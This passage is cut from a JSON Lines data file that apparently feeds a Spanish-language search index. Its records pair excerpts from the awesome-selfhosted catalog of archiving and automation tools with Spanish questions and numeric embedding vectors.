0.15293, 0.09765, -0.02535, 0.07167, 0.06161, -0.06166, -0.06088, 0.09559, -0.0181, 0.12869, 0.0564, 0.07576, -0.07693, 0.08942, 0.09564, -0.0258, -0.05278, -0.03842, -0.08864, 0.04572, 0.01034, -0.03543, 0.10171, -0.08034, -0.06605, 0.06788, -0.10946, 0.01133, 0.10604, 0.0899, 0.01504, 0.01879, -0.02466, 0.02455, 0.00949, 0.02234, -0.06401, -0.08744, 0.00011, -0.08333, -0.02258, 0.00102, -0.03134, -0.02951, 0.04299, -0.03139, -0.02689, 0.10023, 0.03996, 0.01524, 0.07197, -0.01218, -0.06024, 0.02994, -0.07722, 0.02665, -0.01966, -0.02309, -0.06017, 0.01142, 0.00112, -0.11437, -0.02282, 0.03025, -0.08633, 0.08021, 0.02549, 0.01224, 0.0733, -0.06994, -0.07738, 0.04679, 0.10471, 0.05643, -0.04275, 0.08193, -0.05133, -0.07554, -0.03036, -0.02119, -0.04443, -0.05033, 0.04166, -0.04158, -0.11658, 0.05563, 0.03579, 0.07026, -0.03507, -0.10098, 0.01054, 0.01441, -0.06899, 0.04891, -0.01328, -0.02258, -0.07756, -0.00615, -0.01155, -0.0342, -0.02765, -0.04103, 0.07535, -0.08594, -0.15716, -0.02173, -0.00395, 0.00771, 0.00937, 0.07539, -0.00308, -0.06226, -0.02731, 0.07693, 0.00058, -0.06622, 0.02105, -0.00091, -0.03746, -0.04012, -0.00185, -0.00865, -0.0803, 0.12142, 0.0679, -0.03022, 0.01097, 0.00513, -0.02014, -0.1052, 0.03329, 0.10014, -0.00415, 0.06827, -0.05957, -0.0371, -0.00482, -0.00379, 0.06606, 0.04582, 0.03468, -0.00279, -0.07023, -0.09224, 0.02965, 0.12771, -0.02214, -0.04474, 0.02198, -0.02739, -0.13125, 0.05973, 0.02505, -0.0314, -0.05399, 0.0047, 0.05923, -0.09466, 0.07548, 0.02178]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Wayback β€” A self-hosted toolkit for archiving webpages to the Internet Archive, archive.today, IPFS, and local file systems [GPL-3.0, Go].", "indexar": "quΓ© herramienta autoalojada puedo usar para guardar pΓ‘ginas web en mΓΊltiples lugares", "v": [-0.167, 0.07027, -0.14538, -0.18213, -0.08286, -0.02873, -0.00663, -0.07503, -0.08746, -0.12134, -0.09259, -0.1099, -0.02173, -0.00959, 0.09018, 0.08302, 0.09651, -0.10113, 0.01427, -0.0504, 0.02222, -0.00597, -0.09074, -0.02355, -0.16835, 0.02165, 0.14368, -0.06029, -0.21311, 0.10753, -0.03973, 0.0806, 0.07783, -0.0771, -0.13152, -0.03839, 0.06267, 0.08109, -0.07286, -0.05766, -0.01287, 0.08149, -0.10882, 0.00382, -0.01546, 0.09382, -0.05322, -0.03126, -0.08939, 0.08676, 0.0279, -0.12151, -0.15267, -0.01219, 0.01368, -0.0798, 0.26308, -0.08787, -0.00214, -0.03245, -0.09989, 0.07327, -0.04244, 0.11739, -0.04136, -0.08601, -0.00935, 0.01543, -0.09842, 0.03291, -0.02385, 0.03218, 0.18215, 0.00377, 0.03399, -0.03928, 0.02183, 0.07534, 0.06304, 0.0425, -0.02102, -0.00307, -0.08465, -0.02122, -0.08548, -0.06365, -0.01492, -0.04025, 0.01949, -0.05133, -0.00617, 0.01417, -0.00596, -0.03006, -0.08081, -0.08228, 0.02993, 0.06199, 0.0474, -0.05849, 0.1025, -0.06987, -0.01578, 0.03256, -0.00921, -0.00225, -0.01267, 0.00819, -0.01659, -0.00513, 0.10374, -0.00389, -0.04506, -0.04851, -0.04362, 0.07215, 0.06244, 0.00232, 0.03948, -0.13774, -0.02964, 0.04491, -0.04554, -0.00942, 0.04902, 0.01428, 0.01881, 0.0756, -0.05793, -0.06614, -0.00084, -0.05653, -0.10556, -0.03167, -0.01368, 0.01556, 0.00891, -0.07807, -0.01497, -0.01696, 0.04655, -0.00637, -0.13916, -0.09936, 0.02697, -0.01766, -0.01935, 0.05601, -0.10661, -0.01055, -0.01033, -0.08736, -0.00814, -0.04522, -0.01622, -0.00579, 0.0156, -0.0533, -0.02349, -0.02736, -0.05342, -0.01355, 0.06475, 0.10194, 0.03663, -0.0173, -0.03301, 0.01433, 0.07008, 0.02585, 0.03897, 0.07904, 0.02686, -0.10495, 0.0157, -0.02855, -0.05308, 0.02038, -0.00832, -0.05717, -0.05124, -0.05346, -0.01495, 0.02291, -0.02075, -0.04058, 0.05944, -0.04811, -0.04188, -0.00646, -0.03783, 0.06762, -0.00825, -0.03873, 0.09248, 0.02699, 0.00065, -0.04574, 0.05324, 0.00442, -0.04626, -0.02694, -0.0346, -0.01418, 0.03204, 0.03594, -0.06193, -0.01222, -0.02683, 0.01067, 0.00165, -0.05332, 0.01893, -0.05808, -0.04362, -0.05323, 0.00276, -0.01407, -0.06459, -0.03658, 0.06349, -0.00091, 0.0114, -0.02743, 0.02879, 0.02989, 0.01279, -0.03037, 0.01719, 0.02068, 0.00783, -0.02199, -0.02958, 0.02717, 0.03817, -0.05096, 0.0222, 0.00639, -0.02313, -0.00302, -0.00912, 0.05925, 0.01752, 0.01407, -0.00626, -0.05644, -0.0623, 0.02485, -0.00084, -0.03504, -0.03499, -0.01055, 0.01469, -0.03313, 0.00245, 0.00954]} -{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Wayback β€” A self-hosted toolkit for archiving webpages to the Internet Archive, archive.today, IPFS, and local file systems [GPL-3.0, Go].", "indexar": "con quΓ© programa puedo archivar documentos digitales y archivos locales", "v": [0.04867, -0.01173, 0.02139, -0.18098, 0.0076, -0.09023, 0.11727, -0.03751, -0.1613, -0.00772, -0.04377, -0.16718, -0.03085, -0.15314, 0.03052, -0.06566, 0.20731, -0.11665, 0.04867, -0.1018, -0.01638, 0.05052, -0.0778, -0.03737, 0.01793, -0.15162, 0.0398, 0.01716, -0.04687, 0.04665, 0.01817, 0.0651, -0.00361, -0.00491, -0.04867, 0.02337, 0.08997, 0.07847, -0.14373, -0.01922, 0.099, 0.04511, -0.1163, 0.11604, -0.04879, -0.01851, -0.01449, 0.06336, 0.00858, -0.07447, -0.06198, -0.06965, -0.00498, 0.13274, -0.0239, -0.07662, 0.03779, -0.13828, 0.05068, -0.02091, -0.05701, 0.07069, -0.02314, 0.0405, 0.06322, 0.02627, 0.10394, 0.02163, -0.18757, 0.1106, -0.03104, 0.14037, 0.13097, -0.01444, -0.07109, -0.00011, -0.06568, -0.06923, -0.08675, 0.00219, 0.03052, -0.01499, 0.08578, 0.07484, -0.09562, -0.08075, -0.05504, -0.0494, 0.00995, -0.07048, 0.00297, 0.05716, 0.03392, -0.00285, 0.04969, -0.05451, 0.11539, 0.02035, -0.08861, 0.04307, -0.03465, 0.01899, -0.03752, 0.0584, 0.01709, 0.05574, -0.00163, 0.05859, 7e-05, 0.02013, 0.00116, 0.06633, 0.01798, 0.13141, -0.07874, 0.06403, 0.08619, 0.00523, 0.04908, 0.0203, 0.06468, 0.01594, -0.00449, -0.00786, 0.05715, -0.00528, 0.00344, 0.04844, -0.07248, 0.02647, 0.07215, 0.03151, -0.0345, -0.03086, -0.02618, -0.02622, 0.01474, -0.02828, -0.0273, -0.05234, 0.02186, -0.0586, 0.01214, 0.04362, 0.04169, -0.01587, 0.02044, -0.01686, -0.07052, -0.0626, -0.05537, -0.08849, -0.06124, -0.00888, -0.07107, 0.05466, 0.01881, -0.10811, -0.11493, 0.00236, -0.05699, 0.02796, -0.05, 0.03995, -0.00649, -0.10077, 0.01976, 0.10103, 0.04182, 0.01392, 0.02456, 0.01488, 0.00717, -0.13486, -0.02632, 0.00719, -0.01073, -0.04962, 0.06628, -0.0277, -0.10443, 0.03559, 0.08571, 0.09606, -0.04344, -0.01455, 0.03346, -0.07423, 0.02669, -0.00557, -0.00148, -0.01929, -0.07554, 0.05559, 0.01301, -0.03023, -0.07044, 0.05924, -0.00773, -0.00723, -0.05811, -0.01171, -0.0401, 0.0255, 0.06955, 0.13222, -0.08204, -0.00749, 0.00865, 0.04671, -0.06652, -0.05901, 0.04526, -0.01774, -0.08673, -0.0439, -0.03318, 0.01732, -0.0121, -0.00017, 0.07931, -0.0372, 0.06926, 0.0025, 0.08105, -0.04619, 0.0428, 0.02212, -0.0158, -0.06289, -0.02265, -0.03255, -0.02916, -0.00095, 0.01331, 0.02758, 0.01521, -0.01847, -0.08021, -0.06319, -0.02329, 0.07173, -0.03981, 0.01467, -0.04844, 0.01144, -0.06639, 0.0285, 0.04568, -0.00017, 0.01191, 0.03668, 0.00989, -0.0187, -0.0118, 0.03385]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Activepieces β€” No-code business automation tool like Zapier or Tray. For example, you can send a Slack notification for each new Trello card [MIT, Docker]. Apache Airflow β€” Platform to programmatically author, schedule, and monitor workflows [Apache-2.0, Python/Docker]. Automatisch β€” Business automation tool that lets you connect different services like Twitter, Slack, and more to automate your business processes (alternative to Zapier) [AGPL-3.0, Docker]. BookBounty β€” Retrieve missing Readarr books from Library Genesis [⚠, MPL-2.0, Docker]. changedetection.io β€” Stay up-to-date with web-site content changes [Apache-2.0, Python/Docker]. ChiefOnboarding β€” Employee onboarding platform that allows you to provision user accounts and create sequences with todo items, resources, text/email/Slack messages, and more! Available as a web portal and Slack bot [AGPL-3.0, Docker]. Cronicle β€” Simple, distributed task scheduler and runner with a web based UI [MIT, Nodejs].", "indexar": "que herramienta no-code sirve para automatizar tareas de negocio", "v": [-0.06244, -0.00343, -0.21259, -0.20564, 0.04916, -0.17492, -0.07727, -0.00598, -0.1088, -0.01882, -0.08956, -0.19295, 0.04441, -0.02154, 0.08861, 0.07967, 0.1211, -0.11457, 0.06438, 0.06335, 0.0576, 0.00121, -0.03799, -0.00782, -0.10518, -0.02888, 0.02907, -0.07644, -0.29136, 0.1975, -0.03691, -0.01828, 0.12605, -0.13924, 0.00813, -0.05596, 0.00087, 0.06079, -0.01022, 0.03005, 0.06377, 0.13162, -0.11232, 0.04543, 0.06663, 0.05928, 0.03936, -0.06135, -0.02674, 0.1073, 0.0027, -0.19991, -0.05655, -0.07786, 0.02285, -0.03418, 0.09903, -0.04411, -0.04369, -0.08241, -0.01907, -0.00973, -0.05103, -0.03537, -0.05373, 0.01239, 0.11994, -0.02534, 0.03226, 0.10414, -0.03513, 0.05168, -0.0274, -0.08346, -0.02069, 0.00793, 0.01092, 0.04017, -0.04097, 0.00577, 0.07937, 0.00479, -0.12912, 0.05043, -0.00626, -0.10592, 0.00412, 0.03672, 0.05667, -0.06929, -0.05926, 0.13372, 0.00288, -0.00752, 0.06904, 0.08138, 0.04508, -0.0338, -0.00315, 0.05654, 0.11127, -0.07384, -0.09952, 0.03513, 0.02487, 0.05452, -0.0269, 0.03507, -0.03997, -0.00982, -0.03448, -0.0339, -0.00229, 0.01218, -0.07797, 0.06559, -0.00896, 0.0131, -0.00555, -0.04981, 0.01024, 0.07293, -0.00362, 0.02414, 0.0079, -0.03583, 0.04507, 0.12829, 0.03171, -0.13062, 0.01033, -0.00436, -0.05579, 0.03544, 0.01282, 0.01632, 0.04498, -0.10354, -0.08427, -0.07953, -0.02719, 0.02371, -0.03897, -0.02443, 0.07745, 0.06486, 0.07525, -0.05672, 0.00723, 0.03743, 0.05816, -0.03702, -0.0213, -0.01679, -0.03252, 0.01508, -0.00121, 0.07203, -0.0387, 0.04133, 0.0071, -0.03176, 0.03755, 0.00913, -0.02633, -0.04925, 0.02515, 0.02479, 0.05286, 0.05145, -0.01296, 0.02961, 0.0885, -0.0666, 0.00086, 0.00338, -0.02267, 0.0361, -0.00325, -0.04321, -0.01726, -0.01448, 0.01743, -0.03074, 0.04044, -0.00982, 0.03379, -0.02329, -0.03872, 0.03709, -0.08597, -0.05537, -0.03194, -0.08806, 0.05185, 0.03091, -0.00775, -0.03083, 0.02533, -0.04786, -0.0422, -0.0193, -0.00393, 0.03232, -0.02585, 0.07939, 0.0268, -0.01476, 0.06887, 0.00364, 0.00985, -0.02025, 0.00542, 0.00527, -0.01246, -0.04095, -0.06158, -0.00524, 0.0356, -0.00399, 0.00419, -0.06236, 0.009, -0.02676, 0.01649, 0.04109, 0.03846, 0.0277, 0.02959, -0.05446, -0.00656, -0.01635, 0.01384, 0.02121, 0.00211, -0.06625, 0.00094, 0.01966, -0.04092, -0.04476, 0.00117, -0.00113, 0.00467, -0.04795, -0.06212, 0.01504, -0.01826, -0.0536, -0.06257, -0.05158, -0.08189, 0.00135, -0.00751, 0.01242, -0.00426, 0.01785]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Activepieces β€” No-code business automation tool like Zapier or Tray. For example, you can send a Slack notification for each new Trello card [MIT, Docker]. Apache Airflow β€” Platform to programmatically author, schedule, and monitor workflows [Apache-2.0, Python/Docker]. Automatisch β€” Business automation tool that lets you connect different services like Twitter, Slack, and more to automate your business processes (alternative to Zapier) [AGPL-3.0, Docker]. BookBounty β€” Retrieve missing Readarr books from Library Genesis [⚠, MPL-2.0, Docker]. changedetection.io β€” Stay up-to-date with web-site content changes [Apache-2.0, Python/Docker]. ChiefOnboarding β€” Employee onboarding platform that allows you to provision user accounts and create sequences with todo items, resources, text/email/Slack messages, and more! Available as a web portal and Slack bot [AGPL-3.0, Docker]. Cronicle β€” Simple, distributed task scheduler and runner with a web based UI [MIT, Nodejs].", "indexar": "cual programa puedo usar para crear y monitorear flujos de trabajo programΓ‘ticos", "v": [-0.05498, 0.06151, -0.15228, -0.19996, 0.10088, -0.08308, 0.06717, -0.00796, -0.12657, -0.11859, -0.11057, -0.04947, -0.01375, -0.06058, -0.05026, 0.00703, 0.12942, -0.16866, -0.00531, 0.06974, -0.04504, -0.03749, -0.09678, -0.05384, -0.08136, 0.05476, 0.0188, -0.05301, -0.02245, 0.00664, 0.02914, 0.09818, 0.18506, -0.141, 0.06227, -0.08397, 0.0142, 0.01335, -0.01665, 0.08741, -0.034, 0.06554, -0.05684, -0.02225, 0.08872, 0.00104, 0.08516, -0.09033, -0.03613, -0.02037, 0.01304, 0.11637, -0.04564, 0.01056, 0.03197, -0.13308, 0.04247, -0.08504, -0.05073, -0.0027, 0.00182, 0.07916, 0.02182, -0.07991, 0.00722, -0.01863, 0.13704, -0.00076, -0.09331, 0.08742, -0.02188, 0.06096, -0.01092, -0.0342, 0.05141, 0.07534, -0.12127, -0.05939, 0.10209, -0.08609, -0.08774, 0.08054, 0.08035, 0.06135, -0.13737, -0.07075, 0.04865, -0.02663, -0.06885, -0.03467, -0.05428, 0.06649, 0.00889, 0.06304, 0.08854, -0.00512, 0.12491, 0.04666, -0.02089, 0.06309, 0.07246, -0.08417, -0.04078, 0.09288, -0.02343, 0.07165, 0.07237, -0.01692, -0.07362, 0.013, -0.04339, 0.05156, -0.08716, -0.0422, -0.06325, -0.00985, -0.04519, -0.0235, 0.10198, -0.06692, -0.05824, 0.04208, -0.07476, 0.01007, 0.12133, -0.06434, 0.05067, 0.08071, -0.05846, 0.10948, 0.00728, 0.02319, -0.07969, -0.06399, -0.07729, -0.08843, 0.01449, -0.02216, 0.04056, -0.07204, 0.00643, 0.07148, 0.04944, 0.04624, 0.04778, 0.03715, 0.05256, -0.07794, -0.04804, -0.00094, 0.01216, 0.02873, 0.03154, 0.03664, -0.07526, 0.00555, 0.02953, 0.02685, -0.07239, 0.01705, -0.03725, 0.04483, -0.00036, 0.02879, 0.04121, -0.03628, -0.04664, 0.00558, 0.10385, 0.08814, -0.02748, 0.05185, 0.05883, -0.10652, 0.01519, -0.03352, -0.02988, -0.09509, 0.018, 0.01102, -0.07042, 0.11069, 0.01146, 0.0289, -0.02778, -0.0361, -0.00703, 0.06768, 0.01291, 0.04549, -0.00878, 0.04316, -0.01241, -0.03621, 0.00775, -0.04676, 0.0323, -0.05631, 0.01023, -0.04477, -0.02381, -0.02896, 0.00863, -0.05003, 0.03573, 0.1036, -0.04077, 0.04066, 0.03754, 0.13105, 0.04722, -0.07647, 0.04341, 0.0035, -0.01458, 0.00753, -0.0033, 0.02519, 0.05477, 0.03531, 0.04592, -0.02526, 0.00355, 0.03849, 6e-05, -0.08605, 0.0502, 0.04897, 0.00733, -0.00022, -0.03558, -0.00519, -0.04022, -0.06282, -0.01926, 0.04683, 0.00554, -0.00574, 0.03316, -0.08036, -0.01279, 0.07785, -0.02112, -0.05944, -0.00425, 0.00214, -0.07294, 0.0229, -0.04468, -0.03365, -0.02479, 0.05295, 0.02194, -0.04369, 0.06929, 0.02755]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Activepieces β€” No-code business automation tool like Zapier or Tray. For example, you can send a Slack notification for each new Trello card [MIT, Docker]. Apache Airflow β€” Platform to programmatically author, schedule, and monitor workflows [Apache-2.0, Python/Docker]. Automatisch β€” Business automation tool that lets you connect different services like Twitter, Slack, and more to automate your business processes (alternative to Zapier) [AGPL-3.0, Docker]. BookBounty β€” Retrieve missing Readarr books from Library Genesis [⚠, MPL-2.0, Docker]. changedetection.io β€” Stay up-to-date with web-site content changes [Apache-2.0, Python/Docker]. ChiefOnboarding β€” Employee onboarding platform that allows you to provision user accounts and create sequences with todo items, resources, text/email/Slack messages, and more! Available as a web portal and Slack bot [AGPL-3.0, Docker]. Cronicle β€” Simple, distributed task scheduler and runner with a web based UI [MIT, Nodejs].", "indexar": "con que puedo conectar servicios como Slack o Twitter para automatizar procesos empresariales", "v": [-0.04926, 0.01715, -0.14869, -0.19073, 0.08508, -0.13222, -0.03053, -0.0403, -0.10826, 0.04618, -0.21242, -0.0944, 0.06034, -0.01697, -0.02125, 0.18035, 0.06991, -0.14831, 0.01671, -0.03742, 0.1131, 0.03915, -0.10593, -0.07313, 0.00954, 0.01286, 0.07398, -0.075, -0.12206, 0.07496, -0.11101, 0.03529, 0.10011, 0.01923, 0.05543, -0.04922, -0.0312, 0.21019, 0.11362, 0.03786, 0.01052, -0.07377, -0.0929, 0.02967, 0.12388, 0.04103, -0.01435, -0.13735, -0.00783, -0.00356, -0.04488, -0.11331, -0.22921, 0.02734, -0.09003, 0.05422, 0.08302, -0.11503, 0.01689, -0.04879, -0.04004, 0.10067, -0.04673, 0.08619, 0.03548, -0.00859, 0.02369, -0.05486, 0.02539, 0.15437, 0.04562, 0.04134, -0.06988, -0.03028, 0.07936, 0.14404, 0.02681, 0.05332, 0.04156, 0.08964, -0.04926, -0.0055, 0.01714, 0.01125, -0.01407, -0.03648, -0.05911, 0.02216, 0.01919, -0.03425, -0.02228, 0.04048, -0.01212, -0.0498, -0.06461, 0.04621, 0.02041, -0.1059, -0.07065, -0.00934, -0.05147, 0.04688, -0.1219, 0.04934, -0.09033, -0.01857, 0.07763, -0.03327, 0.02674, -0.10206, -0.0232, -0.00686, 0.03939, -0.04643, -0.0159, 0.02635, -0.00863, -0.07629, -0.07671, 0.01633, 0.04544, -0.02556, 0.01293, -0.05118, -0.04198, -0.07484, 0.02154, 0.06675, 0.08111, -0.05375, -0.0378, 0.0102, -0.04028, -0.08758, -0.0489, 0.01164, 0.00298, -0.05001, 0.02909, -0.11097, -0.01528, 0.06196, -0.04237, -0.03325, 0.09973, 0.01277, 0.0304, -0.12643, 0.01306, 0.10119, 0.00963, 0.00856, -0.02881, 0.03148, -0.02674, -0.00966, -0.04272, 0.00189, 0.01918, 0.07424, 0.01425, -0.02462, 0.02227, 0.02254, 0.01782, 0.03704, -0.05539, 0.00653, 0.02607, 0.02713, -0.07165, 0.02967, -0.01144, -0.02439, 0.01501, 0.01936, -0.03733, -0.01611, 0.09081, -0.01079, -0.06542, -0.03293, -0.01711, -0.04011, 0.00933, 0.00362, 0.01532, -0.04321, -0.00249, 0.08543, -0.10113, 0.00658, 0.0357, 0.00603, 0.06914, 0.0217, 0.00113, -0.04656, -0.01926, -0.07901, -0.08749, -0.03505, -0.08888, 0.03869, -0.01814, 0.07966, -0.01738, 0.03053, -0.00245, 0.03075, -0.03462, -0.02414, 0.05437, -0.0594, -0.04575, -0.01325, 0.00246, -0.0551, 0.08505, 0.02923, 0.00591, -0.00948, 0.03598, 0.01393, 0.009, 0.00465, -0.01114, 0.03516, -0.0076, -0.01172, -0.05599, 0.02792, 0.01881, 0.00317, -4e-05, -0.00779, -0.03358, -0.0515, -0.04337, 0.03143, 0.0408, 0.0403, 0.00224, 0.00342, -0.00019, -0.03549, -0.08999, 0.00437, -0.02745, -0.0959, 0.01765, 0.04365, 0.00132, 0.0281, -0.01548, -0.02724]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Cronmaster β€” Cronjob management UI with human readable syntax, live logging and log history for your cronjobs [AGPL-3.0, Docker]. Dagu β€” Powerful Cron alternative with a Web UI. It allows you to define dependencies between commands as a Directed Acyclic Graph (DAG) in a declarative YAML format [GPL-3.0, Go/Docker]. Discount Bandit β€” Track pricing, stock status of products across multiple stores such as Amazon, Ebay, Walmart, etc [⚠, GPL-3.0, PHP/Docker]. Dittofeed β€” Omni-channel customer engagement and messaging automation platform (alternative to Braze, Customer.io, Iterable) [MIT, Docker]. feedmixer β€” Micro web service which takes a list of feed URLs and returns a new feed consisting of the most recent n entries from each given feed (returns Atom, RSS, or JSON) [WTFPL, Python]. flowctl β€” Self-service workflow execution platform with approvals, remote execution and scheduling [Apache-2.0, Go/Docker].", "indexar": "quΓ© herramienta me sirve para gestionar tareas programadas con un panel de control fΓ‘cil de leer?", "v": [-0.01184, 0.1685, -0.17832, -0.25507, -0.00472, -0.12439, -0.03921, 0.09416, -0.00048, -0.05976, -0.13434, -0.01107, 0.06375, -0.09462, 0.07242, 0.124, 0.08488, -0.12223, 0.00646, 0.05451, -0.06704, 0.05172, -0.07019, -0.03773, -0.08416, 0.00288, 0.11924, -0.1296, -0.14414, 0.09697, -0.08215, 0.0443, 0.08301, -0.15385, -0.04603, 0.04211, -0.07041, 0.10799, 0.00504, 0.09816, -0.08522, 0.04513, -0.08625, 0.11328, 0.15735, 0.02321, 0.08176, -0.04949, -0.02635, 0.04929, -0.06849, -0.09192, -0.01297, 0.04062, 0.00376, -0.09721, 0.05492, -0.10803, -0.01535, -0.14054, -0.10505, 0.0625, -0.02231, 0.05986, 0.00873, 0.01008, 0.05563, 0.00663, -0.07263, 0.14064, 0.03028, -0.00406, 0.00328, -0.00857, -0.00791, -0.02593, 0.02495, 0.08851, 0.07507, -0.0514, 0.03605, -0.02185, -0.14032, 0.06595, -0.00848, -0.09692, -0.03835, -0.03282, -0.06112, -0.06316, -0.06118, 0.02786, -0.05425, -0.02875, 0.01103, 0.05292, 0.06825, 0.01036, -0.02987, 0.02692, 0.14386, -0.1076, -0.05777, 0.13225, -0.04338, 0.10881, -0.03357, -0.01944, -0.06801, -0.00618, 0.0073, 0.02445, 0.00693, 0.00222, -0.03025, 0.08186, -0.03274, -0.00486, 0.00934, -0.03538, -0.02143, 0.05661, 0.02113, 0.00416, 0.12583, -0.03677, 0.08785, 0.12171, 0.01278, -0.06452, 0.01239, -0.0529, -0.01779, 0.03023, -0.01973, -0.00918, 0.02955, -0.07502, -0.08018, -0.08828, -0.03826, 0.12448, 0.01565, -0.04109, 0.03226, -0.03816, 0.05881, -0.00479, 0.07255, 0.03881, 0.02567, -0.05512, 0.07032, 0.03341, -0.0076, -0.01338, -0.02828, 0.0264, -0.07504, 0.032, -0.06023, -0.03632, 0.01356, 0.04346, 0.03343, -0.08888, 0.02282, 0.05646, 0.03528, 0.08242, -0.00807, 0.03158, 0.08466, -0.03357, 0.0406, -0.08511, 0.02583, -0.04379, 0.02002, -0.04654, -0.03964, 0.01185, 0.01427, 0.02082, 0.00455, -0.02291, -0.04434, 0.01169, -0.00362, 0.05268, 0.01989, 0.03413, 0.00896, -0.10886, 0.05748, 0.02796, -0.02661, -0.03553, -0.01683, -0.0125, -0.00752, -0.02511, 0.04875, 0.00604, -0.00935, 0.10305, -0.00049, 0.04278, 0.05319, 0.05408, 0.06063, 0.03381, 0.04249, -0.0082, 0.00986, -0.02428, -0.02765, 0.0027, 0.01975, 0.0051, 0.06136, -0.03602, 0.07024, 0.00053, -0.00384, -0.03237, 0.01899, 0.03972, 0.00923, 0.02723, 0.00401, -0.01374, 0.02314, 0.03173, -0.00573, -0.0768, 0.03117, -0.02127, -0.01211, -0.00988, -0.01342, 0.04142, 0.0327, -0.03078, -0.05283, -0.00754, -0.04044, 0.00442, -0.07319, -0.02816, -0.06973, -0.03793, 0.03917, 0.00138, -0.00962, -0.00366]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Cronmaster β€” Cronjob management UI with human readable syntax, live logging and log history for your cronjobs [AGPL-3.0, Docker]. Dagu β€” Powerful Cron alternative with a Web UI. It allows you to define dependencies between commands as a Directed Acyclic Graph (DAG) in a declarative YAML format [GPL-3.0, Go/Docker]. Discount Bandit β€” Track pricing, stock status of products across multiple stores such as Amazon, Ebay, Walmart, etc [⚠, GPL-3.0, PHP/Docker]. Dittofeed β€” Omni-channel customer engagement and messaging automation platform (alternative to Braze, Customer.io, Iterable) [MIT, Docker]. feedmixer β€” Micro web service which takes a list of feed URLs and returns a new feed consisting of the most recent n entries from each given feed (returns Atom, RSS, or JSON) [WTFPL, Python]. flowctl β€” Self-service workflow execution platform with approvals, remote execution and scheduling [Apache-2.0, Go/Docker].", "indexar": "con quΓ© puedo crear dependencias entre diferentes comandos automΓ‘ticamente?", "v": [0.22517, 0.2699, -0.05678, -0.02304, 0.06529, -0.00293, 0.07548, -0.01809, -0.16374, -0.04486, -0.09965, -0.00372, -0.03498, -0.1305, 0.00749, 0.09533, 0.11619, -0.05097, -0.07311, 0.01439, 0.10431, -0.13937, 0.05154, 0.0017, -0.00313, -0.02476, 0.12746, -0.01777, -0.16949, -0.03587, 0.0283, 0.10822, 0.0529, -0.0368, -0.01335, 0.01662, -0.04459, 0.0479, -0.06419, 0.07671, -0.05196, 0.05092, -0.11729, 0.06566, -0.00847, -0.03688, -0.00577, 0.03823, 0.02841, -0.07033, -0.0436, -0.01399, -0.07849, -0.04656, -0.06725, -0.02782, 0.19935, -0.08422, 0.00572, 0.06877, -0.0796, 0.00563, 0.01717, 0.11427, 0.00496, -0.02387, 0.01951, -0.12886, 0.0188, 0.05847, -0.07444, -0.03611, -0.07078, 0.04862, 0.04518, 0.09929, -0.04403, -0.06982, 0.08747, 0.01866, -0.01742, 0.04901, -0.01506, 0.03833, -0.02877, -0.1172, -0.06518, -0.02101, 0.01689, -0.04292, 0.01709, -0.04408, -0.0019, 0.02192, 0.03973, 0.01413, -0.01158, 0.00442, 0.07115, 0.09995, -0.03754, -0.03629, -0.05689, 0.19293, 0.00239, 0.0171, 0.06723, -0.08516, 0.04139, -0.00072, 0.01447, -0.05766, -0.01272, -0.07684, -0.03569, -0.0121, -0.04715, -0.00451, 0.01671, -0.01858, -0.08736, 0.00246, 0.02744, 0.0701, -0.01117, -0.09219, -0.01313, 0.09307, 0.02156, 0.03504, -0.02678, -0.0008, 0.02323, -0.08693, 0.01998, 0.12481, -0.01955, 0.03459, -0.10903, -0.11374, 0.03105, 0.04048, 0.07969, -0.03468, -0.01057, -0.00768, -0.0293, -0.1193, -0.02575, -0.0083, 0.02489, 0.04203, -0.04701, 0.00708, -0.06552, 0.00401, -0.05806, -0.07199, 0.02492, 0.09648, -0.02504, 0.00436, -0.0499, 0.01969, 0.03907, -0.07469, -0.09352, -0.00401, -0.01311, 0.02988, -0.0617, 0.04045, 0.00692, -0.0367, -0.01997, -0.06138, -0.02128, -0.01478, 0.02312, -0.01594, -0.04528, 0.04035, -0.12812, -0.03591, 0.01428, -0.11346, -0.05062, -0.02387, 0.00512, 0.0411, -0.0463, 0.06919, -0.01387, -0.04214, -0.01121, -0.05266, 0.05601, -0.05465, -0.03953, -0.0327, -0.02831, 0.04973, 0.02301, -0.04419, 0.01184, 0.0137, -0.03602, 0.12485, 0.04098, 0.02679, 0.06537, -0.02046, 0.07468, -0.04646, -0.03237, -0.02374, -0.01021, -0.07563, 0.01948, -0.04539, 0.05346, 0.0075, 0.08124, -0.03186, 0.04383, 0.08044, 0.02653, 0.04866, 0.0956, 0.05465, -0.04688, 0.01362, -0.00885, -0.05553, 0.04029, 0.03469, 0.01466, -0.02386, 0.02346, -0.03197, 0.00012, 